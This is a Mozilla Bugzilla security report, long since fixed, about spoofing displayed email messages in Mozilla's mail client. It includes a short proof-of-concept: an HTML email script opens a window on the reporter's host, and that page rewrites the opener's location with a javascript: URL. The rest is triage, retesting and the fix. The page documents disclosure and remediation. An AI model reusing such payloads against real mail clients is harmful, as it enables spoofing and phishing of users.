Closed
Bug 23516
Opened 25 years ago
Closed 24 years ago
Spoofing email messages
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M17
People
(Reporter: joro, Assigned: security-bugs)
References
()
Details
(Whiteboard: [nsbeta2+])
Attachments
(1 file)
1.16 KB,
patch
|
Details | Diff | Splinter Review |
It is possible to spoof email messages by manipulating the location object of
the currently displayed message. This is done by opening a window which does:
opener.location='javascript:s="<H1>Spoofed</H1>"'
The code that must be included in HTML message is:
-------------------------------------------
<SCRIPT>
a=window.open("ht"+"tp://www.nat.bg/~joro/mozilla/openlocation.html");
</SCRIPT>
-------------------------------------------
-----"http://www.nat.bg/~joro/mozilla/openlocation.html"------
<SCRIPT>
setTimeout("opener.location='javascript:s=\"<H1>Spoofed</H1>\"'; ",6000);
// It would be better to use setInterval(), but Mozilla crashes on my box in
this case
</SCRIPT>
--------------------------------------------------------------
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M15
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
Comment 2•25 years ago
|
||
Branch time for M15 has come... and so I'm moving this to M16 (Norris is out
this week).
Target Milestone: M15 → M16
Assignee | ||
Comment 3•24 years ago
|
||
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Assignee | ||
Comment 4•24 years ago
|
||
THis looks directly related to 37907. The fix is probably the same. I will
verify that the sameOrigin check is being done.
Assignee | ||
Updated•24 years ago
|
Status: NEW → ASSIGNED
Assignee | ||
Comment 7•24 years ago
|
||
Assignee | ||
Comment 8•24 years ago
|
||
argh...disregard that patch...posted to the wrong bug.
Comment 9•24 years ago
|
||
it is not fixed yet.
http://cathyz/bugs/23516.html
this page opens a window in another domain http://cathyz2/bugs/1.html,
23516.html is spoofed by script in 1.html, same origin is not checked here I
guess
Status: ASSIGNED → NEW
Comment 11•24 years ago
|
||
Assigning QA to czhang
Assignee | ||
Comment 12•24 years ago
|
||
Marking Confidential as per jar. jtaylor is attempting to reproduce this bug.
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Assignee | ||
Comment 13•24 years ago
|
||
I think this one is also dependent on 28443. jtaylor, can you confirm that this
one is fixed as of 7/6?
Depends on: 28443
Comment 14•24 years ago
|
||
Looks fixed with 2000070608 build.
Assignee | ||
Comment 15•24 years ago
|
||
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Assignee | ||
Comment 17•24 years ago
|
||
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in
before you can comment on or make changes to this bug.
Description
•